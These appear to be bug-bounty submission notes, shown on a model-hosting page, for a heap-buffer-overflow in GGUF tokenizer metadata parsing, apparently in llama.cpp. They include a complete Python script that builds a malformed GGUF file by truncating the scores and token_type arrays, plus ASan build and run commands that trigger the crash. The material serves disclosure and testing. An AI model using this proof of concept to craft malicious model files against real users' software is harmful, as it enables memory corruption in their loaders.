Huntr submission notes
This folder contains a status summary and repro steps for a GGUF heap-buffer-overflow in tokenizer metadata parsing.
Files
- huntr_submission/STATUS.md
PoC model file
- tmp/gguf_fuzz/llama-spm-bad-scores.gguf
Base model file
- models/ggml-vocab-llama-spm.gguf
PoC generation
- The PoC is created by truncating tokenizer.ggml.scores and tokenizer.ggml.token_type by 1 element.
- Script used:
import struct
from pathlib import Path
in_path = Path('models/ggml-vocab-llama-spm.gguf')
out_path = Path('tmp/gguf_fuzz/llama-spm-bad-scores.gguf')
GGUF_TYPE_SIZES = {
0: 1, 1: 1, 2: 2, 3: 2, 4: 4, 5: 4, 6: 4, 7: 1, 8: None, 9: None, 10: 8, 11: 8, 12: 8,
}
GGUF_TYPE_FORMAT = {
0: '<B', 1: '<b', 2: '<H', 3: '<h', 4: '<I', 5: '<i', 6: '<f', 7: '<b', 10: '<Q', 11: '<q', 12: '<d',
}
def read_exact(f, n):
b = f.read(n)
if len(b) != n:
raise EOFError('unexpected EOF')
return b
def read_u32(f): return struct.unpack('<I', read_exact(f, 4))[0]
def read_i32(f): return struct.unpack('<i', read_exact(f, 4))[0]
def read_u64(f): return struct.unpack('<Q', read_exact(f, 8))[0]
def read_i64(f): return struct.unpack('<q', read_exact(f, 8))[0]
def read_string(f):
n = read_u64(f)
return read_exact(f, n)
def parse_file(path):
with open(path, 'rb') as f:
magic = read_exact(f, 4)
version = read_u32(f)
n_tensors = read_i64(f)
n_kv = read_i64(f)
kv_list = []
for _ in range(n_kv):
key = read_string(f)
vtype = read_i32(f)
if vtype == 9:
arr_type = read_i32(f)
arr_len = read_u64(f)
if arr_type == 8:
vals = [read_string(f) for _ in range(arr_len)]
else:
size = GGUF_TYPE_SIZES[arr_type]
data = read_exact(f, size * arr_len)
fmt = GGUF_TYPE_FORMAT[arr_type]
vals = list(struct.unpack('<' + fmt[1] * arr_len, data))
kv_list.append((key, vtype, arr_type, vals))
elif vtype == 8:
val = read_string(f)
kv_list.append((key, vtype, None, val))
else:
size = GGUF_TYPE_SIZES[vtype]
val = struct.unpack(GGUF_TYPE_FORMAT[vtype], read_exact(f, size))[0]
kv_list.append((key, vtype, None, val))
return magic, version, n_tensors, kv_list
def write_file(path, magic, version, n_tensors, kv_list):
with open(path, 'wb') as f:
f.write(magic)
f.write(struct.pack('<I', version))
f.write(struct.pack('<q', n_tensors))
f.write(struct.pack('<q', len(kv_list)))
for key, vtype, arr_type, val in kv_list:
f.write(struct.pack('<Q', len(key)))
f.write(key)
f.write(struct.pack('<i', vtype))
if vtype == 9:
f.write(struct.pack('<i', arr_type))
f.write(struct.pack('<Q', len(val)))
if arr_type == 8:
for s in val:
f.write(struct.pack('<Q', len(s)))
f.write(s)
else:
fmt = GGUF_TYPE_FORMAT[arr_type]
f.write(struct.pack('<' + fmt[1] * len(val), *val))
elif vtype == 8:
f.write(struct.pack('<Q', len(val)))
f.write(val)
else:
f.write(struct.pack(GGUF_TYPE_FORMAT[vtype], val))
magic, version, n_tensors, kv_list = parse_file(in_path)
new_kv = []
for key, vtype, arr_type, val in kv_list:
if key == b'tokenizer.ggml.scores' and vtype == 9:
val = val[:-1]
if key == b'tokenizer.ggml.token_type' and vtype == 9:
val = val[:-1]
new_kv.append((key, vtype, arr_type, val))
write_file(out_path, magic, version, n_tensors, new_kv)
print('wrote', out_path)
Repro (ASan)
cmake -B build-asan -DLLAMA_SANITIZE_ADDRESS=ON -DLLAMA_SANITIZE_UNDEFINED=ON -DGGML_SANITIZE_ADDRESS=ON -DGGML_SANITIZE_UNDEFINED=ON -DGGML_CCACHE=OFF -DLLAMA_BUILD_TESTS=ON -DLLAMA_BUILD_EXAMPLES=ON -DLLAMA_BUILD_TOOLS=ON -DLLAMA_BUILD_SERVER=OFF -DCMAKE_BUILD_TYPE=RelWithDebInfo
cmake --build build-asan --target llama-tokenize -j $(getconf _NPROCESSORS_ONLN)
./build-asan/bin/llama-tokenize -m tmp/gguf_fuzz/llama-spm-bad-scores.gguf -p "hello"
- Downloads last month
- -
Hardware compatibility
Log In
to view the estimation
We're not able to determine the quantization variants.
Inference Providers
NEW
This model isn't deployed by any Inference Provider.
๐
Ask for provider support